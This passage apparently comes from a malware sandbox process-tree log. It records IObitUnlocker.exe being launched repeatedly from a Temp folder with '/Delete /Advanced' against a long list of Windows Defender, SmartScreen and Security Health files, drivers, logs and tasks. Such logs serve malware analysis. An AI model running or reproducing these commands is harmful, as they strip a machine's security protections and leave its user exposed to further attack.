Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                      PID:6840
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                        PID:7060
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                          PID:4636
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                            PID:6376
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                              PID:6680
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                PID:6940
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                  PID:7012
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                    PID:6380
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                      PID:6460
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                        PID:7036
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                          PID:1976
